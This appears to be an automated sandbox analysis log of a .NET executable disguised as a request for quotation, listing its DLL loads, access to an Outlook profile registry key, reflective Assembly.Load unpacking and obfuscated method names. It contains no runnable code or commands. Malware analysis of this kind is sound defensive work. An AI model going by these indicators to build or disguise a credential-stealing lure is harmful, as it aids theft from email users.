                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Request for Quotation Plug Valve.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Request for Quotation Plug Valve.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Source: 1.2.Request for Quotation Plug Valve.exe.28b0e20.0.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, oVQmUjFt7ORJGqy8CL.cs.Net Code: HpsOfk9eaI System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.Request for Quotation Plug Valve.exe.2978f54.1.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, oVQmUjFt7ORJGqy8CL.cs.Net Code: HpsOfk9eaI System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.Request for Quotation Plug Valve.exe.7630000.6.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 1_2_00E846AB push edx; iretd 1_2_00E846AE
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 1_2_00E846AF push edx; iretd 1_2_00E846B2
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 1_2_00E84658 push edx; iretd 1_2_00E8465A
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 1_2_00E847A8 push esi; iretd 1_2_00E847AA
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 1_2_00E847A0 push esi; iretd 1_2_00E847A2
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 1_2_00E84769 push esi; iretd 1_2_00E8476A
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 1_2_00E8476B push esi; iretd 1_2_00E84772
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 1_2_00E85E50 push esp; ret 1_2_00E85E69
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 1_2_00E85F18 push esp; iretw 1_2_00E860F9
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 1_2_07654CAA pushfd ; iretd 1_2_07654CB9
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 1_2_07654BFB push eax; iretd 1_2_07654C01
                    Source: Request for Quotation Plug Valve.exeStatic PE information: section name: .text entropy: 7.779225466224072
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, CeiqZFJnjhjlj2cBvu.csHigh entropy of concatenated method names: 'bUMylNlVVM', 'x3OyVOuS7J', 'WDXJWrCcto', 'JhZJPgsuwK', 'Ts3ya2EM18', 'TOuyvH0Axd', 'IuGyUfH72Z', 'GDgyqnskEx', 'F4NywcHowy', 'N67yiAkgQx'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, cTlpfSZPcGGb8QSBmh.csHigh entropy of concatenated method names: 'DYobxJrZWB', 'bJAbXYvy3U', 't3NbgOE8ib', 'ypfbeL4uPE', 'xpibs5FPZf', 'yJ3gCfqC23', 'sMrgYryyK5', 'JVtg7ed1uw', 'PG1glZWZ7N', 'ImDgFVndt6'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, oVQmUjFt7ORJGqy8CL.csHigh entropy of concatenated method names: 'K3BcxgbO5t', 'EiochYKP2v', 'lWgcX8gGHJ', 'yTec6QE81V', 'D1EcgxpjXj', 'Dcrcbj98vx', 'RdLceHmlql', 'p6lcsDZjMx', 'amAc8WvOl3', 'RX5cIIOVii'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, YH309kapuiU1loYtcC.csHigh entropy of concatenated method names: 'Dispose', 'A9SPFwACj6', 'gEIESZuSuC', 'e2KTTHmGEk', 'QduPVG1Jj3', 'rtoPzkjWbB', 'ProcessDialogKey', 'FKDEWRVEqs', 'YRHEPes1tT', 'XnxEEegYaK'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, lU5lEl3MGZXcKSUE4O.csHigh entropy of concatenated method names: 'VmjBPPJDRr', 'uITBcQl81L', 's9xBO25EpR', 'g0bBhLkjJ6', 'DH5BX5hMmE', 'wAxBgiJX1X', 'WKwBb8HHyr', 'I6qJ7wu7bR', 'El1JlMa25n', 'KqSJFVqkwl'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, vJ6Uos4UDSBTKeNs84T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vyw9qjYEVa', 'ftP9wUyLrg', 'tdA9icp2E5', 'hvI90Rylm1', 'tdb9CYwcHT', 'p0E9YnRaQG', 'vJD97WCxnX'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, AEAUQAHGZWuYo2haO1.csHigh entropy of concatenated method names: 'tBDJhUa8hC', 'bmgJXgnva1', 'iMgJ60FxKB', 'sBPJgfVLOQ', 'yDsJbKMK1o', 'dI7JebT5Au', 'k8KJsp8Swu', 'QhxJ8dMXNj', 'jNFJIDGMmD', 'YLWJKEK3a1'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, kVPHenoYhRnvx7ByvG.csHigh entropy of concatenated method names: 'HnXfaim56', 'Dy0MRalou', 'hwxuvn95L', 'o592I5961', 'ltrNo13pt', 'BH7ofi2JL', 'sGbaNHToPaFAB1nHMA', 'nW0qNRHVC4YwtGg2r2', 'TAZJyU9xG', 'j2e9RBuJr'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, Obwg8344cKx8Vq6cYYO.csHigh entropy of concatenated method names: 'ToString', 'VKy9c2XhDN', 'dLd9Ogcpuo', 'fa39x3PJJQ', 'jup9hNfrY9', 'M819X4HP4A', 'iiU96afwxN', 'KPL9giaOZs', 'PVrSDetzrED2KLdlOSX', 'oRcB1ZXnNqjKj0Zytt4'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, gcOxdHzlMpDRkp3foS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HaNBLoLNRc', 'LOWB5qQPov', 'RXKBnmlY3F', 'mnjByoVPF9', 'li9BJns7df', 'FxVBB0g9EA', 'sf1B96JQoB'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, mX5lZQf14Y4vmHBl6g.csHigh entropy of concatenated method names: 'Xxu6MpDkb2', 'BKa6uWnccw', 'tsh6HkDxPa', 'bd06N1e7se', 'bYQ65dGVw0', 'C2y6nlOymW', 'uII6ykdFuk', 'TGW6JZRJJ2', 'oTN6BGbXah', 'Q7Z69mC8Oo'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, tubn9U6Xcr3rV2SkV9.csHigh entropy of concatenated method names: 'pOiCn930DUG3HcPSxhF', 'hZmgID3Ke4jVvYo1g4S', 'oiJFe73ypgg38y58F52', 'adcbJkq9lW', 'huMbBsivuq', 'uNnb95bhfA', 'XltUF43JeZKnVEcYQTE', 'ok2KX43VlcICqXVJdog'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, NsTPTGXblfc3bcgyRi.csHigh entropy of concatenated method names: 'JAKXq33Syo', 'FPXXwG3TqH', 'f46XiqUFUT', 'R8lX0LiQ1o', 'AoJXChijY7', 'f5lXYE2eAL', 'bKnX7dKB07', 'lLBXlj1YGX', 'tdrXFpZG7x', 'PIlXVikMST'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, WleXrMrsrxEvCFlsrq.csHigh entropy of concatenated method names: 'mgIJk5p6UK', 'jAqJSf7HjK', 'DUEJDtD2v3', 'xIIJG1jJm0', 'hj1JqSgi5j', 'gCxJQFRavc', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, pq44S94bFJCMmq3UOsM.csHigh entropy of concatenated method names: 'WA6B1clu0v', 'BrUBrOeOmS', 'BdoBfktrsY', 'vgiBMM8Iug', 'O5FB3maIhW', 'LByBuyYeMQ', 'BRMB2FtklK', 'FuSBHmjKkO', 'oOdBNlB58t', 'gOyBoSC0j7'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, XNdSwjvdB2jmw6APpF.csHigh entropy of concatenated method names: 'RNcLH4elE2', 'InyLNvEquf', 'kq3LkQfkPt', 'EQJLSUdo3u', 'QZtLGjf6FT', 'PiLLQuIHwk', 'sCuL4bZaPY', 'BprLpc564O', 'yqPLdO5aKD', 'V6WLa5cpQ1'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, rL7WHPq1CmcimKVrpO.csHigh entropy of concatenated method names: 'X1L5dFQUcs', 'fOt5vw4ery', 'hsZ5qGKuUV', 'wdg5wZWLHN', 'YhS5SySmV4', 'HtQ5DkJHNk', 'cMa5GIEsMv', 'nt55Q9mO2N', 'YAj5tGDXOJ', 'HWU54ygL1a'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, OGWKdKhWOB85qEo1Jm.csHigh entropy of concatenated method names: 'wWDe1kq2FV', 'p40erWGmj9', 'yPvef1Jix7', 'EMpeMJ7Q67', 'sE2e3nq8S9', 'MD5euR2HFL', 'X0He2ftoOm', 'uOTeHoFlpQ', 'FZ1eNTGu39', 'imSeogfrlb'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, Wu07OfSGKg18tnUm6N.csHigh entropy of concatenated method names: 'Dqvg3TUNDO', 'W9Fg2dLaTt', 'HsJ6DZ910r', 'heY6GJy6ex', 'TfN6Qus0R6', 'ijc6tChNV3', 'bOa64OrgBy', 'wQZ6p7Z6ad', 'z0x6mau2fB', 'JMS6dsGHB4'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, WKSUxJdUAcFBg50a2b.csHigh entropy of concatenated method names: 'pHnbZ8OGDI', 'g2yb1BI8J3', 'FXabfxNW1Z', 'unKbMY3lBi', 'S4lbu6G7HI', 'VROb2h0Rl0', 's3abNAJjkO', 'TCGbo1tv25', 'BahfjH3UXWxS2SRTQ0n', 'sH9Q313wfuEpkwTjAdF'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, QBg919QotU4lls9Qe0.csHigh entropy of concatenated method names: 'RkMPenUGNg', 'ua1PsHTVW7', 'TU8PI3QQIU', 'iibPKhftJH', 'QNSP5GLTaL', 'MPPPn0eqAa', 'jQuZGLleUL45reLpk8', 's089j2AVlluIK6RV4s', 'X4QPPfJBqS', 'PEePc0P6Ra'
                    Source: 1.2.Request for Quotation Plug Valve.exe.3a7b460.3.raw.unpack, cfuEKp9WUDtA9cTn3a.csHigh entropy of concatenated method names: 'M3qeh2jZ3M', 'CHme61xTEy', 'OyaebPAn8Q', 'kMMbVnO6lA', 'giXbzro6j3', 'qtGeW5oasu', 'PojePvBqG9', 'yO8eE87sGW', 'D3decX2g5s', 'A1MeOgfm2L'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, CeiqZFJnjhjlj2cBvu.csHigh entropy of concatenated method names: 'bUMylNlVVM', 'x3OyVOuS7J', 'WDXJWrCcto', 'JhZJPgsuwK', 'Ts3ya2EM18', 'TOuyvH0Axd', 'IuGyUfH72Z', 'GDgyqnskEx', 'F4NywcHowy', 'N67yiAkgQx'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, cTlpfSZPcGGb8QSBmh.csHigh entropy of concatenated method names: 'DYobxJrZWB', 'bJAbXYvy3U', 't3NbgOE8ib', 'ypfbeL4uPE', 'xpibs5FPZf', 'yJ3gCfqC23', 'sMrgYryyK5', 'JVtg7ed1uw', 'PG1glZWZ7N', 'ImDgFVndt6'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, oVQmUjFt7ORJGqy8CL.csHigh entropy of concatenated method names: 'K3BcxgbO5t', 'EiochYKP2v', 'lWgcX8gGHJ', 'yTec6QE81V', 'D1EcgxpjXj', 'Dcrcbj98vx', 'RdLceHmlql', 'p6lcsDZjMx', 'amAc8WvOl3', 'RX5cIIOVii'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, YH309kapuiU1loYtcC.csHigh entropy of concatenated method names: 'Dispose', 'A9SPFwACj6', 'gEIESZuSuC', 'e2KTTHmGEk', 'QduPVG1Jj3', 'rtoPzkjWbB', 'ProcessDialogKey', 'FKDEWRVEqs', 'YRHEPes1tT', 'XnxEEegYaK'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, lU5lEl3MGZXcKSUE4O.csHigh entropy of concatenated method names: 'VmjBPPJDRr', 'uITBcQl81L', 's9xBO25EpR', 'g0bBhLkjJ6', 'DH5BX5hMmE', 'wAxBgiJX1X', 'WKwBb8HHyr', 'I6qJ7wu7bR', 'El1JlMa25n', 'KqSJFVqkwl'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, vJ6Uos4UDSBTKeNs84T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vyw9qjYEVa', 'ftP9wUyLrg', 'tdA9icp2E5', 'hvI90Rylm1', 'tdb9CYwcHT', 'p0E9YnRaQG', 'vJD97WCxnX'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, AEAUQAHGZWuYo2haO1.csHigh entropy of concatenated method names: 'tBDJhUa8hC', 'bmgJXgnva1', 'iMgJ60FxKB', 'sBPJgfVLOQ', 'yDsJbKMK1o', 'dI7JebT5Au', 'k8KJsp8Swu', 'QhxJ8dMXNj', 'jNFJIDGMmD', 'YLWJKEK3a1'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, kVPHenoYhRnvx7ByvG.csHigh entropy of concatenated method names: 'HnXfaim56', 'Dy0MRalou', 'hwxuvn95L', 'o592I5961', 'ltrNo13pt', 'BH7ofi2JL', 'sGbaNHToPaFAB1nHMA', 'nW0qNRHVC4YwtGg2r2', 'TAZJyU9xG', 'j2e9RBuJr'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, Obwg8344cKx8Vq6cYYO.csHigh entropy of concatenated method names: 'ToString', 'VKy9c2XhDN', 'dLd9Ogcpuo', 'fa39x3PJJQ', 'jup9hNfrY9', 'M819X4HP4A', 'iiU96afwxN', 'KPL9giaOZs', 'PVrSDetzrED2KLdlOSX', 'oRcB1ZXnNqjKj0Zytt4'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, gcOxdHzlMpDRkp3foS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HaNBLoLNRc', 'LOWB5qQPov', 'RXKBnmlY3F', 'mnjByoVPF9', 'li9BJns7df', 'FxVBB0g9EA', 'sf1B96JQoB'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, mX5lZQf14Y4vmHBl6g.csHigh entropy of concatenated method names: 'Xxu6MpDkb2', 'BKa6uWnccw', 'tsh6HkDxPa', 'bd06N1e7se', 'bYQ65dGVw0', 'C2y6nlOymW', 'uII6ykdFuk', 'TGW6JZRJJ2', 'oTN6BGbXah', 'Q7Z69mC8Oo'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, tubn9U6Xcr3rV2SkV9.csHigh entropy of concatenated method names: 'pOiCn930DUG3HcPSxhF', 'hZmgID3Ke4jVvYo1g4S', 'oiJFe73ypgg38y58F52', 'adcbJkq9lW', 'huMbBsivuq', 'uNnb95bhfA', 'XltUF43JeZKnVEcYQTE', 'ok2KX43VlcICqXVJdog'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, NsTPTGXblfc3bcgyRi.csHigh entropy of concatenated method names: 'JAKXq33Syo', 'FPXXwG3TqH', 'f46XiqUFUT', 'R8lX0LiQ1o', 'AoJXChijY7', 'f5lXYE2eAL', 'bKnX7dKB07', 'lLBXlj1YGX', 'tdrXFpZG7x', 'PIlXVikMST'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, WleXrMrsrxEvCFlsrq.csHigh entropy of concatenated method names: 'mgIJk5p6UK', 'jAqJSf7HjK', 'DUEJDtD2v3', 'xIIJG1jJm0', 'hj1JqSgi5j', 'gCxJQFRavc', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, pq44S94bFJCMmq3UOsM.csHigh entropy of concatenated method names: 'WA6B1clu0v', 'BrUBrOeOmS', 'BdoBfktrsY', 'vgiBMM8Iug', 'O5FB3maIhW', 'LByBuyYeMQ', 'BRMB2FtklK', 'FuSBHmjKkO', 'oOdBNlB58t', 'gOyBoSC0j7'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, XNdSwjvdB2jmw6APpF.csHigh entropy of concatenated method names: 'RNcLH4elE2', 'InyLNvEquf', 'kq3LkQfkPt', 'EQJLSUdo3u', 'QZtLGjf6FT', 'PiLLQuIHwk', 'sCuL4bZaPY', 'BprLpc564O', 'yqPLdO5aKD', 'V6WLa5cpQ1'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, rL7WHPq1CmcimKVrpO.csHigh entropy of concatenated method names: 'X1L5dFQUcs', 'fOt5vw4ery', 'hsZ5qGKuUV', 'wdg5wZWLHN', 'YhS5SySmV4', 'HtQ5DkJHNk', 'cMa5GIEsMv', 'nt55Q9mO2N', 'YAj5tGDXOJ', 'HWU54ygL1a'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, OGWKdKhWOB85qEo1Jm.csHigh entropy of concatenated method names: 'wWDe1kq2FV', 'p40erWGmj9', 'yPvef1Jix7', 'EMpeMJ7Q67', 'sE2e3nq8S9', 'MD5euR2HFL', 'X0He2ftoOm', 'uOTeHoFlpQ', 'FZ1eNTGu39', 'imSeogfrlb'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, Wu07OfSGKg18tnUm6N.csHigh entropy of concatenated method names: 'Dqvg3TUNDO', 'W9Fg2dLaTt', 'HsJ6DZ910r', 'heY6GJy6ex', 'TfN6Qus0R6', 'ijc6tChNV3', 'bOa64OrgBy', 'wQZ6p7Z6ad', 'z0x6mau2fB', 'JMS6dsGHB4'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, WKSUxJdUAcFBg50a2b.csHigh entropy of concatenated method names: 'pHnbZ8OGDI', 'g2yb1BI8J3', 'FXabfxNW1Z', 'unKbMY3lBi', 'S4lbu6G7HI', 'VROb2h0Rl0', 's3abNAJjkO', 'TCGbo1tv25', 'BahfjH3UXWxS2SRTQ0n', 'sH9Q313wfuEpkwTjAdF'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, QBg919QotU4lls9Qe0.csHigh entropy of concatenated method names: 'RkMPenUGNg', 'ua1PsHTVW7', 'TU8PI3QQIU', 'iibPKhftJH', 'QNSP5GLTaL', 'MPPPn0eqAa', 'jQuZGLleUL45reLpk8', 's089j2AVlluIK6RV4s', 'X4QPPfJBqS', 'PEePc0P6Ra'
                    Source: 1.2.Request for Quotation Plug Valve.exe.6d70000.5.raw.unpack, cfuEKp9WUDtA9cTn3a.csHigh entropy of concatenated method names: 'M3qeh2jZ3M', 'CHme61xTEy', 'OyaebPAn8Q', 'kMMbVnO6lA', 'giXbzro6j3', 'qtGeW5oasu', 'PojePvBqG9', 'yO8eE87sGW', 'D3decX2g5s', 'A1MeOgfm2L'
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
